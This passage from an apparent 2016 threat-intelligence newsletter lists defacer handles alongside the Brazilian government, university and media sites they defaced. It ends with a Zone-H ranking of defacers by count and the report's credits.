Anarchy Ghost forum.cgu.gov.br F5 Big-IP mirror

Anarchy Ghost ojs.cgu.gov.br F5 Big-IP mirror

Anarchy Ghost relats.cgu.gov.br F5 Big-IP mirror

Anarchy Ghost www.todosjuntoscontracorrupcao... F5 Big-IP mirror

Ashiyane Digital Security Team santoaugusto.rs.gov.br/curricu... Linux mirror

d3b~X carsale.uol.com.br/nyet.gif Linux mirror

djawa.hattab prefeituradegoias.go.gov.br/_i... Linux mirror

fallaga team carrascobonito.to.gov.br Linux mirror

fallaga team esperantina.to.gov.br Linux mirror

fallaga team saosebastiao.to.gov.br Linux mirror

Fatal Error www.cauce.gov.br Win 2012 mirror

Fatal Error www.caumt.gov.br Win 2012 mirror

Fatal Error www.cmfloresta.pr.gov.br Linux mirror

Fathur.xZ seed.mg.gov.br/i.html Linux mirror

Fathur.xZ tecnologia.mg.gov.br/i.html Linux mirror

Fathur.xZ www.minasdigital.mg.gov.br/i.html Linux mirror

Page 17: CyberSec.TV 1 | Pageinformationwarfarecenter.com/cir/archived/pre/IWC-CIR-2016-August.pdf · It has been a long time since the last Cyber Intelligence Report (CIR), and there has

Cyber Intelligence Report

CyberSec.TV 17 | P a g e

Hacker Sakit Hati www.machado.mg.gov.br Linux mirror

Hani Xavi ctareja.fe.unb.br Linux mirror

HighTech www.acjunior.em.ufop.br Linux mirror

HighTech www.arquivopermanente.em.ufop.br Linux mirror

HighTech www.assint.ufop.br Linux mirror

HighTech www.caint.ufop.br Linux mirror

HighTech www.comitedeetica.ufop.br Linux mirror

HighTech www.congressolusobrasileiro.uf... Linux mirror

HighTech www.congressomediacao.ufop.br Linux mirror

HighTech www.encontrodesaberes.ufop.br Linux mirror

HighTech www.ielmomarinho.rn.gov.br Linux mirror

HighTech www.intercom.ufop.br Linux mirror

HighTech www.leishvaccines2012.ufop.br Linux mirror

HighTech www.mpec.ufop.br Linux mirror

HighTech www.neab.ufop.br Linux mirror

HighTech www.nupetur.ufop.br Linux mirror

HighTech www.pmec.sp.gov.br Linux mirror

HighTech www.posedu.ufop.br Linux mirror

HighTech www.prace.ufop.br Linux mirror

HighTech www.pro-ativa.ufop.br Linux mirror

HighTech www.proad.ufop.br Linux mirror

HighTech www.propp.ufop.br Linux mirror

HighTech www.revistamusear.ufop.br Linux mirror

HighTech www.sbqs2009.ufop.br Linux mirror

HighTech www.sext.ufop.br Linux mirror

HighTech www.sic.ufop.br Linux mirror

HighTech www.sisbin.ufop.br Linux mirror

ice-cream uaitec.mg.gov.br/x.htm Linux mirror

jok3r stm.jus.br/images/0wn.txt Linux mirror

K3N1 esic.mulungudomorro.ba.gov.br Linux mirror

K3N1 esic.saogabriel.ba.gov.br Linux mirror

Laakel En Person conselhos.cut.org.br/system/ Linux mirror

Laakel En Person cop.cut.org.br/system/ Linux mirror

Laakel En Person frentebrasil.org.br/system/ Linux mirror

Laakel En Person www.cdhic.org.br/system/ Linux mirror

Monsters Defacers www.camaraafranio.pe.gov.br Win 2008 mirror

Monsters Defacers www.cantodoburiti.pi.gov.br Win 2008 mirror

Monsters Defacers www.cmcaldeiraogrande.pi.gov.br Win 2008 mirror

Monsters Defacers www.pedrodorosario.ma.gov.br Win 2008 mirror

Monsters Defacers www.ribeirogoncalves.pi.gov.br Win 2008 mirror

Moroccan Hassan www.ifac.ufop.br/colegiado/ Linux mirror

Moroccan Hassan www.ilb.ufop.br Linux mirror

Moroccan Hassan www.leir.ufop.br/colecao/ Linux mirror

NeT.Defacer saofranciscodeassis.rs.gov.br/... Linux mirror

ProtoWave risadaria.uol.com.br/campeonato/ Linux mirror

ProtoWave zecabaleiro.uol.com.br Linux mirror

ProtoWave Reloaded adm.cyclops.ufsc.br Linux mirror

Page 18: CyberSec.TV 1 | Pageinformationwarfarecenter.com/cir/archived/pre/IWC-CIR-2016-August.pdf · It has been a long time since the last Cyber Intelligence Report (CIR), and there has

Cyber Intelligence Report

CyberSec.TV 18 | P a g e

ProtoWave Reloaded atendimento.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded biblio.campobom.rs.gov.br Linux mirror

ProtoWave Reloaded biblioteca.campobom.rs.gov.br Linux mirror

ProtoWave Reloaded colegiados.if.sc.usp.br/cta/pr... Linux mirror

ProtoWave Reloaded cyclops.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded economia.estadao.com.br/intera... Linux mirror

ProtoWave Reloaded forbes.tj.ba.gov.br/precregesp... Linux mirror

ProtoWave Reloaded forbes.tjba.jus.br/precregespe... Linux mirror

ProtoWave Reloaded gqs.incod.ufsc.br Linux mirror

ProtoWave Reloaded hemoterapia.incod.ufsc.br Linux mirror

ProtoWave Reloaded moodle.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded pesquisa.incod.ufsc.br Linux mirror

ProtoWave Reloaded politica.estadao.com.br/intera... Linux mirror

ProtoWave Reloaded redir.uol.com.br/carlaperez Linux mirror

ProtoWave Reloaded sigsc.incod.ufsc.br Linux mirror

ProtoWave Reloaded site.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded survey.gqs.ufsc.br Linux mirror

ProtoWave Reloaded sysadm.cyclops.ufsc.br Linux mirror

ProtoWave Reloaded tmp.mpce.mp.br/pWave.shtml Win 2003 mirror

ProtoWave Reloaded uol.com.br/carlaperez Linux mirror

ProtoWave Reloaded webservice.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded wikiclima.incod.ufsc.br Linux mirror

ProtoWave Reloaded wikidesastres.incod.ufsc.br Linux mirror

ProtoWave Reloaded wikiunasus.telemedicina.ufsc.br Linux mirror

ProtoWave Reloaded www.conexaosaude.ufsc.br Linux mirror

ProtoWave Reloaded www.crecigo.gov.br/modules/mod... Linux mirror

ProtoWave Reloaded www.creciro.gov.br/modules/mod... Linux mirror

ProtoWave Reloaded www.cyclops.ufsc.br Linux mirror

ProtoWave Reloaded www.ead.fiocruz.br/_xml/cool.htm Linux mirror

ProtoWave Reloaded www.estadao.com.br/interativid... Linux mirror

ProtoWave Reloaded www.gqs.ufsc.br Linux mirror

ProtoWave Reloaded www.incod.ufsc.br Linux mirror

ProtoWave Reloaded www.lapix.ufsc.br Linux mirror

ProtoWave Reloaded www.palestinadegoias.go.gov.br Linux mirror

ProtoWave Reloaded www.tj.ba.gov.br/precregespecial/ Linux mirror

ProtoWave Reloaded www.tjba.jus.br/precregespecial/ Linux mirror

ProtoWave Reloaded www.turvelandia.go.gov.br Linux mirror

ProtoWave Reloaded www2.tj.ba.gov.br/precregespec... Linux mirror

ProtoWave Reloaded www2.tjba.jus.br/precregespecial/ Linux mirror

ProtoWave Reloaded www5.ensp.fiocruz.br/etica/coo... Linux mirror

Security Attack www.saeourinhos.sp.gov.br Win 2008 mirror

Sh33t www.camaramuitoscapoes.rs.gov.br Linux mirror

Silver Lords www.benjaminconstant.am.gov.br Linux mirror

Silver Lords www.boaesperanca.pr.gov.br Linux mirror

Silver Lords www.brasilnovo.pa.gov.br Linux mirror

Silver Lords www.camaratupaciguara.mg.gov.br Linux mirror

Silver Lords www.campinapolis.mt.gov.br Linux mirror

Page 19: CyberSec.TV 1 | Pageinformationwarfarecenter.com/cir/archived/pre/IWC-CIR-2016-August.pdf · It has been a long time since the last Cyber Intelligence Report (CIR), and there has

Cyber Intelligence Report

CyberSec.TV 19 | P a g e

Silver Lords www.capivaridosul.rs.gov.br Linux mirror

Silver Lords www.cerrogrande.rs.gov.br Linux mirror

Silver Lords www.chapadadonorte.mg.gov.br Linux mirror

Silver Lords www.cmranchoalegre.pr.gov.br Linux mirror

Silver Lords www.douradina.pr.gov.br Linux mirror

Silver Lords www.exu.pe.gov.br Linux mirror

Silver Lords www.franciscobadaro.mg.gov.br Linux mirror

Silver Lords www.gedott.unifesp.br/images/j... Linux mirror

Silver Lords www.iapu.mg.gov.br Linux mirror

Silver Lords www.itambedomatodentro.mg.gov.br Linux mirror

Silver Lords www.jacupiranga.sp.gov.br Linux mirror

Silver Lords www.jequitiba.mg.gov.br Linux mirror

Silver Lords www.jordao.ac.gov.br Linux mirror

Silver Lords www.monteazulpaulista.sp.gov.br Linux mirror

Silver Lords www.palmarespaulista.sp.gov.br Linux mirror

Silver Lords www.pedrinopolis.mg.gov.br Linux mirror

Silver Lords www.piracaia.sp.gov.br Linux mirror

Silver Lords www.pontalinda.sp.gov.br Linux mirror

Silver Lords www.riopardo.mg.gov.br Linux mirror

Silver Lords www.ruropolis.pa.gov.br Linux mirror

Silver Lords www.santoexpedito.sp.gov.br Linux mirror

skizo dio.es.gov.br/webroot Win 2008 mirror

Sons of Anarchy www.ce.senac.br/trabalhe-conosco/ F5 Big-IP mirror

Spy_Unkn0wn antares.ucpel.tche.br/cic/ Linux mirror

Spy_Unkn0wn intranet.ucpel.tche.br/cic/ Linux mirror

Trev0rR00t www.camaradeconceicao.pb.gov.br Linux mirror

v0ldsec revitec2.cpafac.embrapa.br Linux mirror

VandaTheGod desenvolvimento.aracatuba.sp.g... Linux mirror

Xaveroz_Tersakiti gestaoesaude.unb.br Linux mirror

Xaveroz_Tersakiti www.sied-enped2016.ead.ufscar.br Linux mirror

Page 20: CyberSec.TV 1 | Pageinformationwarfarecenter.com/cir/archived/pre/IWC-CIR-2016-August.pdf · It has been a long time since the last Cyber Intelligence Report (CIR), and there has

Cyber Intelligence Report

CyberSec.TV 20 | P a g e

Zone-H attack statistics:

N° | Notifier | Single def. | Mass def. | Total def. | Homepage def. | Subdir def.
1. | Barbaros-DZ | 3449 | 157 | 3606 | 1224 | 2382
2. | Ashiyane Digital Security Team | 3077 | 4260 | 7337 | 1395 | 5942
3. | Hmei7 | 2867 | 1513 | 4380 | 775 | 3605
4. | LatinHackTeam | 1438 | 1266 | 2704 | 2254 | 450
5. | iskorpitx | 1324 | 955 | 2279 | 786 | 1493
6. | Fatal Error | 1212 | 2169 | 3381 | 3001 | 380
7. | HighTech | 1084 | 4133 | 5217 | 4209 | 1008
8. | oroboruo | 956 | 1120 | 2076 | 1579 | 497
9. | chinahacker | 889 | 1344 | 2233 | 4 | 2229
10. | MCA-CRB | 854 | 626 | 1480 | 374 | 1106
11. | By_aGReSiF | 759 | 1431 | 2190 | 804 | 1386
12. | Index Php | 713 | 286 | 999 | 228 | 771
13. | 3n_byt3 | 674 | 1955 | 2629 | 929 | 1700
14. | HEXB00T3R | 614 | 622 | 1236 | 407 | 829
15. | brwsk007 | 612 | 261 | 873 | 31 | 842
16. | d3b~X | 606 | 642 | 1248 | 64 | 1184
17. | Red Eye | 605 | 1568 | 2173 | 2133 | 40
18. | Swan | 590 | 271 | 861 | 264 | 597
19. | uykusuz001 | 561 | 153 | 714 | 38 | 676
20. | 1923Turk | 553 | 1618 | 2171 | 471 | 1700
21. | Dr.SHA6H | 546 | 1302 | 1848 | 1501 | 347
22. | Mafia Hacking Team | 519 | 680 | 1199 | 330 | 869
23. | Over-X | 517 | 1783 | 2300 | 1390 | 910
24. | ZoRRoKiN | 507 | 312 | 819 | 249 | 570
25. | Digital Boys Underground Team | 476 | 446 | 922 | 190 | 732


Credits:
Jeremy Martin, IWC: Sr. Editor, Author, Designer, Threat Researcher
Amy Martin, IWC: Editor
Steve Williams, Scot Bradeen, CF360: Editor
Elisabeth Martin, IWC: Editor

Sponsors:
Information Warfare Center (IWC): www.informationwarfarecenter.com
Cyber Forensics 360 (CF360): www.cyberforensics360.com
Cyber Secrets: www.YouTube.com/iwccybersec